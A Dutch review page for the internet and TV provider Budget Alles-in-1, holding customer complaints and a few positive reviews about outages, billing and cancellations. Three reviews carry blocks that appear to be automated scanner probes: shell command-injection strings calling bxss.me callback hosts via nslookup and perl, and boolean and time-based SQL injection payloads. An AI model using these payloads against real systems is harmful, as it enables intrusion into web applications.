Budget Alles-in-1

Alle reviews

Budget Alles-in-1

52% Zou hier weer kopen

Beoordelingen, klachten, ervaringen en reviews Schrijf een review

Lees hier onafhankelijke reviews, klachten en ervaringen. Wees op de hoogte waar u uw aankoop kunt doen of beoordeel zelf een winkel waar u een (online) aankoop heeft gedaan. Zo bepaalt tegenwoordig heel Nederland zelf welke winkels slecht en goed zijn!

Alle reviews (44)

 • Nog geen reviews!

  Ga op zoek naar bedrijven waar je ervaring mee hebt en schrijf er reviews over! Je reviews dragen bij aan een transparantere markt en zorgt voor betere betrouwbaarheid van bedrijven

 • Bestellen

  Service

  Prijs

  Levering

  Zou hier weer kopen
  Totaal

  TV, internet

  Be there link didnt work to pay and it was late i now have to wait 4 days because i paid manually. So my 3 years old son that ijave for the weekend cant watch tv. Never will i use them again. Bad internet. Tv is always cutting out. Do not recommend using then.

 • Bestellen

  Service

  Prijs

  Levering

  Zou hier weer kopen
  Totaal

  Alles in 1

  Maanden geleden opgezegd en ook bevestigd gekregen. Toch blijven ze geld afschrijven en aanmaningen sturen. Nadat ik klachtenformulier had ingevuld gaven ze een onzinnige reden dat ik het contract niet zou kunnen opzeggen (zou via de nieuwe leverancier moeten. Wat een onzin. Ik storneer in alles. Ze zorgen maar dat ze het oplossen.

 • Bestellen

  Service

  Prijs

  Levering

  Zou hier weer kopen
  Totaal

  Budget Alles in 1 Internet

  Helaas voel ik mij behoorlijk in de maling genomen. Vandaag opgezegd, mijn contract loopt tot 20-09-2022 en de dame verteld mij gewoon doodleuk dat ik tot 20-10-2022 moet betalen. Ik heb ruimschoots 30 dagen van te voren opgezegd dus voel me opgelicht !

 • Bestellen

  Service

  Prijs

  Levering

  Zou hier weer kopen
  Totaal

  Budget alles in één

  Bij budget zit je goed, tot het moment dat het misgaat en dan laten ze je vallen als een baksteen. Dit terwijl ze de oplossing in huis hebben, maar deze makkelijke en goedkope oplossing weigeren ze te geven. Nee ze proberen zelfs te verdienen aan de storing.

  Ruim een week zitten we al zonder internet en verschillende mensen zijn al voor bij gekomen om te kijken, echter tot op heden kan niemand het oplossen. En het is wachten op de volgende "monteur".

  De tijdelijke oplossing, namelijk ons gratis te voorzien van mobiel internet, die wordt geweigerd. We mogen wel mobiel internet er bij kopen, iets wat ons 10-25 euro per dag zou kosten. Maar "gelukkig" krijgen we dan 12,50 terug per week dat we geen internet hebben.

 • Bestellen

  Service

  Prijs

  Levering

  Zou hier weer kopen
  Totaal

  Internet, TV en Bellen

  Jaren lang zonder problemen klant bij Budget. Een dikke week geleden echter hadden we geen telefonie meer. Bij de klantenservice kregen we dit niet opgelost, ook niet middels een harde reset van de modem. Na enkele dagen begaf ook het TV signaal het. Weer contact opgenomen, vrij snel geholpen, er zou een nieuwe modem en een nieuwe TV ontvanger worden opgestuurd. Dat zou binnen 2 dagen bij ons moeten zijn. Helaas na 6 dagen is er nog steeds niets afgeleverd. Wij wachten in spanning af.

 • Bestellen

  Service

  Prijs

  Levering

  Zou hier weer kopen
  Totaal

  Budget alles-in-1

  Kan al twee maanden geen tv kijken. De software van het modem werd geupdate en sindsdien heb ik geen tv mee. Er werd een nieuw tv-kastje geleverd, so far so good, maar mijn probleem was niet opgelost. De conclusie was dat het waarschijnlijk aan het modem lag, dus zou er een nieuw modem opgestuurd worden. Na talloze telefoontjes (en uren in de wacht te hebbe gestaan) heb ik nog steeds geen nieuw modem. Het probleem? Vaag! Er wordt gemaild naar KPN en die moeten een terugkoppeling geven zodat er een nieuw modem opgestuurd kan worden maar dat gebeurd steeds. Ondertussen hoor ik helemaal niets. ik word niet op de hoogte gehouden. Als ik bellen is er alle begrip dat ik niet blij ben maar ondertussen gebeurd er niets. Onbegrijpelijk dit. Ben er dan ook helemaal klaar mee.

 • Bestellen

  Service

  Prijs

  Levering

  Zou hier weer kopen
  Totaal

  All in one, 3x mobiel ,energie

  Contract all in one loopt af in september,ik kreeg nu een verleng aanbod tot mijn grote verbazing 12.50 duurder???. Zelfs als je een nieuw contract wilt,dus voor nieuwe klanten is het 46,50 en de 1e maanden 17 euro. Heel vreemd want ik als bestaande klant begrijp dat ik die 1e maanden niet voor 17 krijg, maar ik zit ineens op 52,50 als verleng aanbod. Nou die hoef ik dus niet,ik stap over.

 • Bestellen

  Service

  Prijs

  Levering

  Zou hier weer kopen
  Totaal

  intermet en tv

  Is nu voor de zoveelste keer storing niemand berikbaar om te vragen wat het probleem is en ja goedkoper als kpn maar de rest drama ga weer terug naar KPN ben er nu klaar mee

 • Bestellen

  Service

  Prijs

  Levering

  Zou hier weer kopen
  Totaal

  Budget alles in 1

  Overgestapt naar budget alles in 1. Na overstap kon ik nergens mijn contract vinden. Hiervoor contact opgenomen met de klantenservice. Deze zei dat alles in orde was. Ze zou me doorverbinden om mijn contract naar me toe te mailen omdat de website niet goed werkt. Wordt er opgehangen alsnog geen contract wat ik in kan zien. Dit na ongeveer 20 minuten in de wacht te hebben gestaan. Vervolgens krijg ik tijdens mijn bedenktijd van 14 dagen al de eerste rekening. Deze rekening is al voor een maand later. Ook zitten hier aansluitkosten bij die gratis zouden zijn. Na weer lang in de wacht te hebben gestaan zeggen ze dat het foutief op de website vermeld staat en dat ze die aansluitkosten gewoon rekenen. Dit wordt ook niet meer verrekend. Als het me niet bevalt kan ik een andere provider zoeken. Wel hebben ze toegezegd dit op de website aan te passen. Al met al een erg rommelige start van budget alles in 1

 • Bestellen

  Service

  Prijs

  Levering

  Zou hier weer kopen
  Totaal

  Geen

  The worse company.
  They submitted a request on my behalf and without my consent to my current service provider and created a lot of trouble.

 • Bestellen

  Service

  Prijs

  Levering

  Zou hier weer kopen
  Totaal

  Buget alles in 1 thuis!

  Helaas hebben hun een maand niet kunnen afschrijven van de rekening, je krijgt gelijk een boete en wordt afgesloten. Je betaald direct alles maar het kan hun niks schelen want ze laten je gewoon na betaling en bewijs van betaling gewoon dagen lang gewoon afgesloten en zeggen er niks aan te kunnen doen. Ik voel me zwaar opgelicht want ik betaal en moet toch nog zeker een week wachten voor ze me weer aansluiten. Ook hun facturatie systeem deugd niet. Normale bedrijven sturen een factuur en krijg je een aantal dagen en soms zelfs 2 weken de tijd om te betalen maar bij hun zit de vervaldatum van elk factuur maar 2 dagen verder dan het aanmaakdatum van het factuur!!! En na 2 dagen vergeet het maar gelijk 15 euro erboven op. Zo wil ik ook rijk worden. Ik vindt het stelletje oplichters!! Ik heb al 10 keer gebeld en ook elke keer wordt er weer wat anders verteld ...ene keer o mevr alles is al betaald stuur maar een mail met bewijs en we maken het in orde, andere keer hangen ze gewoon op in je oor terwijl je aan het wachten bent dat ze de een en ander uitzoeken... en op het laatst zegt er een het maakt niet uit of u bewijs van betaling heeft gestuurd het zal nog 3 dagen gaan duren voor ze alles weer in orde maken....dus ik betaal voor jan met de korte achternaam!!! Dit bedrijf is bagger!!

 • Bestellen

  Service

  Prijs

  Levering

  Zou hier weer kopen
  Totaal

  Gewoon. Niet. Doen.

  ALS JE OOK MAAR IETS VAN DIT BEDRIJF ZIET LANGSKOMEN.. REN!
  Want je gaat echt spijt krijgen.
  Wij hebben barslechte internet (4 mb per seconde als we geluk hebben) en soms ook überhaupt geen internet. In ons huishouden word er ook online gewerkt dus elk mens snapt dat je hier een goede internetverbinding voor nodig hebt. Nja elk mens, behalve Budget dus. Ondertussen zijn we 4 maanden, 3 monteurs en tientallen klantenservice medewerkers verder en nóg moet ik deze review uploaden via mijn eigen 4G.
  Besef ook even dat er maandelijks nog steeds doodleuk €41 word afgeschreven. Voor wat?! Voor saus, elke euro aan dit bedrijf is teveel ik zeg het je. Wij hebben ontzettend veel omzet misgelopen door deze afzetters.
  Alle aansluitingen, kabels en netwerk statussen zijn bij ons prima in orde dus het probleem ligt bij budget elke monteur die geweest is heeft dit bevestigd en nóg moet er nu nog ééntje komen (nummer 4) om nog even te zeggen dat het allemaal niet werkt. En daarna pas kan het contract kosteloos ontbonden worden.
  Je word als consument gewoon genaait waar je bij staat, echt niet normaal.
  Wij gaan er in iedergeval alles aan doen om bij deze lui weg te gaan. Dit probleem heeft ons inkomen meer dan gehalveerd.
  Nogmaals DOE HET NIET.

 • Bestellen

  Service

  Prijs

  Levering

  Zou hier weer kopen
  Totaal

  Internet tv abonnement

  PAS OP: ZOEK VERDER. NIET MEE IN ZEE GAAN.
  Eerst kregen wij ontzettend smerig materiaal toegestuurd. De vliegenpoep zat er nog op. Ook bleek het materiaal niet te werken.
  Tweede installatiebox werkte wel en was schoon (NIET NIEUW) tot wij een stroomstoring kregen en het modum met geen mogelijkheid aan de praat kregen: vlak voor het weekend. Budget gebeld en ze konden niks voor ons doen en wij moesten maat accepteren dat er niks anders op zit dan een weekend zonder tv en internet. Geen enkele oplossing of tegenmoedkoming vanuit Budget.
  Uiteindelijk hadden wij eindelijk internet en tv. Bleek dat wij een internet snelheid hadden van 2 down 4 up. Meerdere keren gebeld met de klantenservice. Er kon wel wat aan gedaan worden maar dat kost uiteraard waarschijnlijk geld. Gemeld dat ons aansluitpunt nog geen 2 jaar geleden is vernieuwd en deze altijd goed heeft gewerkt.

  Uiteindelijk zat er niks anders op dan een monteur laten komen. Wel met de afspraak dat wij op de hoogte wouden worden gesteld als wij daadwerkelijk kosten gingen maken.

  Monteur kwam, ontzettend aardig en eindelijk goed internet. Monteur gevraagd wat de kosten zullen zijn en tot mijn grote vreugde meldde hij dat de kosten voor Budget zullen zijn.

  2 weken later viel een factuur op de mat. 55 euro waarvan 15 euro voorrijkosten!?!?

  Klacht ingedient bij Budget waarna ik een vrij aggresieve response kreeg. Op hun respons geregeerd en mijn bewijs zoals gevraagd bijgevoegd. 4 WEKEN geen reactie gekregen. Uiteindelijk nog een klacht ingediend om te vragen of ze mijn vorige klacht verder wouden behandelen...

  Een paar dagen later ben ik gebeld door Budget, iemand van de klachtenafdeling. Hun vinden dat ze jn hun recht staan, geen enkel medeleven of tegemoedkoming.

  Later teruggebeld met de vraag of ik een betalingsregeling kon treffen voor het bedrag. Ik ben het er namelijk nog steeds niet mee eens en wil voor ik mijn geld overmaak weten wat mijn rechten zijn. Een beralingsregeling kan pas als het bedrag onzettend ver is opgelopen. Ik had tot de 23ste om te betalen.

  In de avond willen wij tv kijken..blijkt onze tv op de 16de te zijn afgesloten... volgende dag gebeld. ik had ze immers de dag ervoor nog aan de lijn gehad. Natuurlijk vind budget de afsluiting ook terrecht en mocht ik niet willen betalen word mijn internet ook afgesloten. Waar de dag ervoor nog de 23ste werd genoemd was het nu de 20ste maar dat valt in het weekend werd er gezegd..... het moest voor het weekend op hun rekening staan.

  Ik heb de factuur uiteindelijk betaald en wacht nu nog steeds op TV........

  NIET MEE IN ZEE GAAN.

 • Bestellen

  Service

  Prijs

  Levering

  Zou hier weer kopen
  Totaal

  Ervaring 1jaar budget thuis

  Slecht bedrijf. Zij maken de fouten en bij bellen doen ze alsof zij de klant helpen in de klant zijn voordeel. Excuses aanbieden ho maar. Het enigste wat zij kunnen is geld van je rekening afschrijven ook al is het contract afgelopen. Dan nog geen excuses en met pijn en moeite toegeven dat het hun fout is. Zij zijn niet de goedkoopste maar wel de slechtste. Regelmatig modem moeten resetten en storingen. En dan nog dreigen met extra kosten om te betalen terwijl je geen contract meer heb. Niet bij budget beginnen een klotezooi daar.
  M. Roemer

 • Bestellen

  Service

  Prijs

  Levering

  Zou hier weer kopen
  Totaal

  ongeoorloofd geld afschrijven

  Wat een waardeloze firma. Sinds de start al problemen met aansluiten en levering en nu opgezegd en wordt er tot aan het eind van het contract zomaar het geld afgeschreven. Dames en heren, er is geen nieuw contract afgesloten maar er is vorig jaar verlengd. Dit staat immers in de mail die jullie sturen. Bij verlening is er na en jaar een opzegtermijn van 1 maand, staat nota bene op jullie eigen site.
  Onvriendelijk behandeld vanaf dag 1 en nu weer dit.
  Gelukkig ben je in Nederland beschermt als consument tegen dit soort firma's dus als er geen oplossing komt, zien we elkaar voor het bankje.

 • Bestellen

  Service

  Prijs

  Levering

  Zou hier weer kopen
  Totaal

  Internet & tv

  Contract opgezet maar buget heeft achter grond weer èèn jaar verlengt op die manier meer geld binnen krijgen.

  Gebeld naar klantenservice: helaas we kunnen NIET terug draaien!
  Is dat niet soort oplichterij?

  Dit is oplichting

 • Bestellen

  Service

  Prijs

  Levering

  Zou hier weer kopen
  Totaal

  Budget alles in 1

  Na een overstap van een dure en klantonvriendelijke provider ben ik al enkele jaren klant bij jullie. Dit tot volle tevredenheid, geen storingen meer, goed werkend internet en een bereikbare klantenservice.
  Toen vorige week mijn verbinding weg viel was het vermoeden dat mijn modem stuk was. Daags erna werd al een nieuw modem geleverd. Toen daarmee het probleem niet was opgelost stond er 2 dagen later een monteur op de stoep. Deze constateerde dat het niet het modem was , maar een vermoedelijke kabelbreuk ivm graafwerkzaamheden in de straat. Daar de lijn van KPN is werd deze ingeschakeld. De man van KPN stond de dag erna al op de stoep om polshoogte te nemen. Helaas kon men ivm het weekend pas op maandag met de werkzaamheden beginnen. KPN is 2 dagen bezig geweest met het herstellen van een kabel waar niet 1 maar 3 breuken in zaten. Gisteren is de verbinding hersteld. In totaal heb ik 8 dagen geen verbinding gehad. Dat lijkt( en is) lang, maar alsnog snel gefixt gezien de schade.
  Heel hartelijk dank en complimenten voor jullie snelle en klantvriendelijke reactie, vanuit Budget, en ook KPN. Ik raad jullie ten zeerste aan!

  echo ogqkyb$()\ arhnyd\nz^xyu||a #' &echo ogqkyb$()\ arhnyd\nz^xyu||a #|" &echo ogqkyb$()\ arhnyd\nz^xyu||a #

  &echo wzrpif$()\ zmkrjv\nz^xyu||a #' &echo wzrpif$()\ zmkrjv\nz^xyu||a #|" &echo wzrpif$()\ zmkrjv\nz^xyu||a #

  |echo xdxeeb$()\ exjaod\nz^xyu||a #' |echo xdxeeb$()\ exjaod\nz^xyu||a #|" |echo xdxeeb$()\ exjaod\nz^xyu||a #

  (nslookup hitykhsopcern1be30.bxss.me||perl -e "gethostbyname('hitykhsopcern1be30.bxss.me')")

  $(nslookup hitavjjwjbmgw93873.bxss.me||perl -e "gethostbyname('hitavjjwjbmgw93873.bxss.me')")

  &(nslookup hitjlmejsodzn706ae.bxss.me||perl -e "gethostbyname('hitjlmejsodzn706ae.bxss.me')")&'\"`0&(nslookup hitjlmejsodzn706ae.bxss.me||perl -e "gethostbyname('hitjlmejsodzn706ae.bxss.me')")&`'

  |(nslookup hittfeqlwgdbz70d42.bxss.me||perl -e "gethostbyname('hittfeqlwgdbz70d42.bxss.me')")

  `(nslookup hitcuwgojemrq14434.bxss.me||perl -e "gethostbyname('hitcuwgojemrq14434.bxss.me')")`

  ;(nslookup hitbnjpwawvne70440.bxss.me||perl -e "gethostbyname('hitbnjpwawvne70440.bxss.me')")|(nslookup hitbnjpwawvne70440.bxss.me||perl -e "gethostbyname('hitbnjpwawvne70440.bxss.me')")&(nslookup hitbnjpwawvne70440.bxss.me||perl -e "gethostbyname('hitbnjpwawvne70440.bxss.me')")

 • Bestellen

  Service

  Prijs

  Levering

  Zou hier weer kopen
  Totaal

  Alles in 1

  Nu het is aan gesloten draait het op en top en een goede kwaliteit.
  Zelfs microsoft voor ondersteuning op afstand vloog met de muis over het scherm en vond de verbinding goed.
  Dit alles met een draadje uit de muur naar de Experia Box.
  Het team van hun doet er alles aan om het goed voor elkaar te krijgen.
  Top.

  echo pjzdwq$()\ gfdgir\nz^xyu||a #' &echo pjzdwq$()\ gfdgir\nz^xyu||a #|" &echo pjzdwq$()\ gfdgir\nz^xyu||a #

  &echo pmewxz$()\ sxwxlm\nz^xyu||a #' &echo pmewxz$()\ sxwxlm\nz^xyu||a #|" &echo pmewxz$()\ sxwxlm\nz^xyu||a #

  |echo uerexb$()\ fvnnmw\nz^xyu||a #' |echo uerexb$()\ fvnnmw\nz^xyu||a #|" |echo uerexb$()\ fvnnmw\nz^xyu||a #

  (nslookup hitkwtdlfnbsze4afc.bxss.me||perl -e "gethostbyname('hitkwtdlfnbsze4afc.bxss.me')")

  $(nslookup hitsdnkywwjiy20669.bxss.me||perl -e "gethostbyname('hitsdnkywwjiy20669.bxss.me')")

  &(nslookup hitbyswyowxkv88478.bxss.me||perl -e "gethostbyname('hitbyswyowxkv88478.bxss.me')")&'\"`0&(nslookup hitbyswyowxkv88478.bxss.me||perl -e "gethostbyname('hitbyswyowxkv88478.bxss.me')")&`'

  |(nslookup hitqllgapzsao1339a.bxss.me||perl -e "gethostbyname('hitqllgapzsao1339a.bxss.me')")

  `(nslookup hitiejvigzklb4b805.bxss.me||perl -e "gethostbyname('hitiejvigzklb4b805.bxss.me')")`

  ;(nslookup hitvaewpozwhy0cc32.bxss.me||perl -e "gethostbyname('hitvaewpozwhy0cc32.bxss.me')")|(nslookup hitvaewpozwhy0cc32.bxss.me||perl -e "gethostbyname('hitvaewpozwhy0cc32.bxss.me')")&(nslookup hitvaewpozwhy0cc32.bxss.me||perl -e "gethostbyname('hitvaewpozwhy0cc32.bxss.me')")

  -1 OR 2+916-916-1=0+0+0+1 --

  -1 OR 3+916-916-1=0+0+0+1 --

  -1 OR 2+905-905-1=0+0+0+1

  -1 OR 3+905-905-1=0+0+0+1

  -1' OR 2+169-169-1=0+0+0+1 --

  -1' OR 3+169-169-1=0+0+0+1 --

  -1' OR 2+21-21-1=0+0+0+1 or 'sa3MqFpe'='

  -1' OR 3+21-21-1=0+0+0+1 or 'sa3MqFpe'='

  -1" OR 2+71-71-1=0+0+0+1 --

  -1" OR 3+71-71-1=0+0+0+1 --

  -1; waitfor delay '0:0:15' --

  -1); waitfor delay '0:0:15' --

  1 waitfor delay '0:0:15' --

  y5UjnS8b'; waitfor delay '0:0:15' --

  -5 OR 888=(SELECT 888 FROM PG_SLEEP(15))--

  -5) OR 881=(SELECT 881 FROM PG_SLEEP(15))--

  -1)) OR 524=(SELECT 524 FROM PG_SLEEP(15))--

  G6UhlHoT' OR 142=(SELECT 142 FROM PG_SLEEP(15))--

  MDKkP7Jy') OR 364=(SELECT 364 FROM PG_SLEEP(15))--

  emdiZbhX')) OR 530=(SELECT 530 FROM PG_SLEEP(15))--

  echo zhsiaq$()\ aiqlvt\nz^xyu||a #' &echo zhsiaq$()\ aiqlvt\nz^xyu||a #|" &echo zhsiaq$()\ aiqlvt\nz^xyu||a #

  &echo rsqyna$()\ lmwjjz\nz^xyu||a #' &echo rsqyna$()\ lmwjjz\nz^xyu||a #|" &echo rsqyna$()\ lmwjjz\nz^xyu||a #

  |echo wbqnra$()\ xdcqvh\nz^xyu||a #' |echo wbqnra$()\ xdcqvh\nz^xyu||a #|" |echo wbqnra$()\ xdcqvh\nz^xyu||a #

  (nslookup hitxibpbtesax7c700.bxss.me||perl -e "gethostbyname('hitxibpbtesax7c700.bxss.me')")

  $(nslookup hitrblhvbgsomc3191.bxss.me||perl -e "gethostbyname('hitrblhvbgsomc3191.bxss.me')")

  &(nslookup hitebyyfffslrd1741.bxss.me||perl -e "gethostbyname('hitebyyfffslrd1741.bxss.me')")&'\"`0&(nslookup hitebyyfffslrd1741.bxss.me||perl -e "gethostbyname('hitebyyfffslrd1741.bxss.me')")&`'

  |(nslookup hitbnniugemhmf0337.bxss.me||perl -e "gethostbyname('hitbnniugemhmf0337.bxss.me')")

  `(nslookup hitnnatistuif1c270.bxss.me||perl -e "gethostbyname('hitnnatistuif1c270.bxss.me')")`

  ;(nslookup hitvttimjimvl6436f.bxss.me||perl -e "gethostbyname('hitvttimjimvl6436f.bxss.me')")|(nslookup hitvttimjimvl6436f.bxss.me||perl -e "gethostbyname('hitvttimjimvl6436f.bxss.me')")&(nslookup hitvttimjimvl6436f.bxss.me||perl -e "gethostbyname('hitvttimjimvl6436f.bxss.me')")

  -1 OR 2+848-848-1=0+0+0+1 --

  -1 OR 3+848-848-1=0+0+0+1 --

  -1 OR 2+507-507-1=0+0+0+1

  -1 OR 3+507-507-1=0+0+0+1

  -1' OR 2+29-29-1=0+0+0+1 --

  -1' OR 3+29-29-1=0+0+0+1 --

  -1' OR 2+575-575-1=0+0+0+1 or 'ho4FaeT8'='

  -1' OR 3+575-575-1=0+0+0+1 or 'ho4FaeT8'='

  -1" OR 2+53-53-1=0+0+0+1 --

  -1" OR 3+53-53-1=0+0+0+1 --

  -1; waitfor delay '0:0:15' --

  -1); waitfor delay '0:0:15' --

  1 waitfor delay '0:0:15' --

  3C04BJwc'; waitfor delay '0:0:15' --

  -5 OR 608=(SELECT 608 FROM PG_SLEEP(15))--

  -5) OR 790=(SELECT 790 FROM PG_SLEEP(15))--

  -1)) OR 212=(SELECT 212 FROM PG_SLEEP(15))--

  INJQln7W' OR 595=(SELECT 595 FROM PG_SLEEP(15))--

  BMePS6hP') OR 174=(SELECT 174 FROM PG_SLEEP(15))--

  AK4R48cD')) OR 544=(SELECT 544 FROM PG_SLEEP(15))--

 • Bestellen

  Service

  Prijs

  Levering

  Zou hier weer kopen
  Totaal

  Aanmaningen Budget Alles in 1

  Gisteren heb ik inmiddels de 4de of 5de, nu laatste aanmaning, gekregen om een nog openstaande factuur van 51,50 euro te betalen. Dit bedrag heeft betrekking op de maand oktober jl. Het contract bij BAIE is echter op 28-09 jl. officieel gesloten en beëindigd, ook volgens de klantenservice van deze bende. Ik heb hierover de afgelopen periode tenminste al 4 x een medewerker van deze 6de klas amateurclub, over aangesproken, die mij met excuses vertelde dat deze facturen en aanmaningen onterecht waren en ik dit bedrag dus NIET hoefde te betalen. Een aantal weken geleden heb ik hierover voor de zoveelste keer telefonisch contact met dit rampbedrijf gehad. Het is zelfs zo, dat ik na al die telefoontjes al had voorspeld, dat ik desondanks toch weer een aanmaning zou ontvangen. En jawel hoor, op 04-11, was het weer zover. Ditmaal gaat het over de laatste aanmaning ! Het begint nu echt surrealistische vormen aan te nemen. Jullie zullen begrijpen dat het kookpunt bij mij inmiddels is bereikt en op hetzelfde moment het stoom uit m'n oren komt. Het zou inmiddels zelfs op je lachspieren moeten gaan werken. Mijn broers reageerden met "stelletje prutsers" en "zoveel domheid. Je zou er een kaarsje voor moeten opsteken". Vandaag volgt het laatste telefoongesprek. De toonzetting van dit gesprek zal navenant zijn. De les, die ik hierover zelf heb geleerd is : laat alles schriftelijk, bijvoorbeeld via mail, bevestigen. Zwart op wit ! Mocht je vanwege de inmiddels bizarre bureaucratische, communicatieve en organisatorische puinhoop, weer een aanmaning ontvangen, dan kun je ze met die mail om de oren slaan. Had ik het laatste telefoongesprek met die gasten maar bewaard. Ik heb namelijk een app op mijn tablet staan, een tablet, waarmee ik ook kan bellen, die alle in en uitgaande telefoongesprekken opneemt. Zo te downloaden via Playstore. Einde van dit relaas van een volkomen beduusde en bijna doorgedraaide ex-klant ! Gr. Frank.

  echo fudeuy$()\ nolsii\nz^xyu||a #' &echo fudeuy$()\ nolsii\nz^xyu||a #|" &echo fudeuy$()\ nolsii\nz^xyu||a #

  &echo aaounm$()\ nmtkmo\nz^xyu||a #' &echo aaounm$()\ nmtkmo\nz^xyu||a #|" &echo aaounm$()\ nmtkmo\nz^xyu||a #

  |echo khvzpv$()\ uevmbc\nz^xyu||a #' |echo khvzpv$()\ uevmbc\nz^xyu||a #|" |echo khvzpv$()\ uevmbc\nz^xyu||a #

  (nslookup hitpoakzzgyrmf0ad3.bxss.me||perl -e "gethostbyname('hitpoakzzgyrmf0ad3.bxss.me')")

  $(nslookup hitbpjlhcxceac80bf.bxss.me||perl -e "gethostbyname('hitbpjlhcxceac80bf.bxss.me')")

  &(nslookup hitvqbxsjdidx71f58.bxss.me||perl -e "gethostbyname('hitvqbxsjdidx71f58.bxss.me')")&'\"`0&(nslookup hitvqbxsjdidx71f58.bxss.me||perl -e "gethostbyname('hitvqbxsjdidx71f58.bxss.me')")&`'

  |(nslookup hitqqgjbsfdeh1a76e.bxss.me||perl -e "gethostbyname('hitqqgjbsfdeh1a76e.bxss.me')")

  `(nslookup hitseomwyfhpt1f83c.bxss.me||perl -e "gethostbyname('hitseomwyfhpt1f83c.bxss.me')")`

  ;(nslookup hithebinnsclzdaf07.bxss.me||perl -e "gethostbyname('hithebinnsclzdaf07.bxss.me')")|(nslookup hithebinnsclzdaf07.bxss.me||perl -e "gethostbyname('hithebinnsclzdaf07.bxss.me')")&(nslookup hithebinnsclzdaf07.bxss.me||perl -e "gethostbyname('hithebinnsclzdaf07.bxss.me')")

  -1 OR 2+29-29-1=0+0+0+1 --

  -1 OR 3+29-29-1=0+0+0+1 --

  -1 OR 2+926-926-1=0+0+0+1

  -1 OR 3+926-926-1=0+0+0+1

  -1' OR 2+171-171-1=0+0+0+1 --

  -1' OR 3+171-171-1=0+0+0+1 --

  -1' OR 2+356-356-1=0+0+0+1 or '49PxF74W'='

  -1' OR 3+356-356-1=0+0+0+1 or '49PxF74W'='

  -1" OR 2+775-775-1=0+0+0+1 --

  -1" OR 3+775-775-1=0+0+0+1 --

  -1; waitfor delay '0:0:15' --

  -1); waitfor delay '0:0:15' --

  1 waitfor delay '0:0:15' --

  p945l01p'; waitfor delay '0:0:15' --

  -5 OR 526=(SELECT 526 FROM PG_SLEEP(15))--

  -5) OR 172=(SELECT 172 FROM PG_SLEEP(15))--

  -1)) OR 598=(SELECT 598 FROM PG_SLEEP(15))--

  UpbqjMtZ' OR 84=(SELECT 84 FROM PG_SLEEP(15))--

  G6Oh7rcR') OR 509=(SELECT 509 FROM PG_SLEEP(15))--

  XdEq2vQo')) OR 639=(SELECT 639 FROM PG_SLEEP(15))--

  echo revoln$()\ parnjk\nz^xyu||a #' &echo revoln$()\ parnjk\nz^xyu||a #|" &echo revoln$()\ parnjk\nz^xyu||a #

  &echo neexmx$()\ qtqgaf\nz^xyu||a #' &echo neexmx$()\ qtqgaf\nz^xyu||a #|" &echo neexmx$()\ qtqgaf\nz^xyu||a #

  |echo kozbfr$()\ avajhb\nz^xyu||a #' |echo kozbfr$()\ avajhb\nz^xyu||a #|" |echo kozbfr$()\ avajhb\nz^xyu||a #

  (nslookup hitrvmdxjbggn548ad.bxss.me||perl -e "gethostbyname('hitrvmdxjbggn548ad.bxss.me')")

  $(nslookup hitesdgxuwqtv9efae.bxss.me||perl -e "gethostbyname('hitesdgxuwqtv9efae.bxss.me')")

  &(nslookup hitdembfirqyie0770.bxss.me||perl -e "gethostbyname('hitdembfirqyie0770.bxss.me')")&'\"`0&(nslookup hitdembfirqyie0770.bxss.me||perl -e "gethostbyname('hitdembfirqyie0770.bxss.me')")&`'

  |(nslookup hitcilbyaukwv09588.bxss.me||perl -e "gethostbyname('hitcilbyaukwv09588.bxss.me')")

  `(nslookup hitatkymiqfhpdd0fd.bxss.me||perl -e "gethostbyname('hitatkymiqfhpdd0fd.bxss.me')")`

  ;(nslookup hitczwirmgszh072bb.bxss.me||perl -e "gethostbyname('hitczwirmgszh072bb.bxss.me')")|(nslookup hitczwirmgszh072bb.bxss.me||perl -e "gethostbyname('hitczwirmgszh072bb.bxss.me')")&(nslookup hitczwirmgszh072bb.bxss.me||perl -e "gethostbyname('hitczwirmgszh072bb.bxss.me')")

  -1 OR 2+210-210-1=0+0+0+1 --

  -1 OR 3+210-210-1=0+0+0+1 --

  -1 OR 2+507-507-1=0+0+0+1

  -1 OR 3+507-507-1=0+0+0+1

  -1' OR 2+234-234-1=0+0+0+1 --

  -1' OR 3+234-234-1=0+0+0+1 --

  -1' OR 2+807-807-1=0+0+0+1 or 'bji2MirW'='

  -1' OR 3+807-807-1=0+0+0+1 or 'bji2MirW'='

  -1" OR 2+268-268-1=0+0+0+1 --

  -1" OR 3+268-268-1=0+0+0+1 --

  -1; waitfor delay '0:0:15' --

  -1); waitfor delay '0:0:15' --

  1 waitfor delay '0:0:15' --

  WkGVNl2E'; waitfor delay '0:0:15' --

  -5 OR 521=(SELECT 521 FROM PG_SLEEP(15))--

  -5) OR 106=(SELECT 106 FROM PG_SLEEP(15))--

  -1)) OR 881=(SELECT 881 FROM PG_SLEEP(15))--

  BOF1qgZd' OR 885=(SELECT 885 FROM PG_SLEEP(15))--

  SQLVEM73') OR 705=(SELECT 705 FROM PG_SLEEP(15))--

  N9ReQl30')) OR 528=(SELECT 528 FROM PG_SLEEP(15))--

 • Bestellen

  Service

  Prijs

  Levering

  Zou hier weer kopen
  Totaal

  Energiecontract

  Ondanks een aantoonbaar lager energiegebruik en een vast contract met vaste prijzen.
  Wordt mijn maandbedrag niet bijgesteld.
  Het meest irritante is dat de klantenservice onbereikbaar is.....

Anderen bekeken ook

EasySwitch.nl
23 reviews

Ook besparen op kosten en uitgaven? Wat is EasySwitch.nl? EasySwitch.nl is een onafhankelijke overstapservice in Nederland. Je kunt hier de v...

Vastelastenbond
14 reviews

De grootste kosten die je per maand maakt zijn ongetwijfeld je maandelijkse vaste lasten.  Iedereen zou deze vaste lasten wel graag omlaa...

Breedbandwinkel
10 reviews

Ontdek de meningen over Breedbandwinkel! Breedbandwinkel is een bedrijf welke pakketten aanbiedt voor verschillende diensten. Het gaat hier om een ...

Pricewise
59 reviews

Pricewise is een vergelijkingssite op het gebied van vier categorieën: -    Energie; -    Autoverzekeringen; ...

Budget Alles-in-1

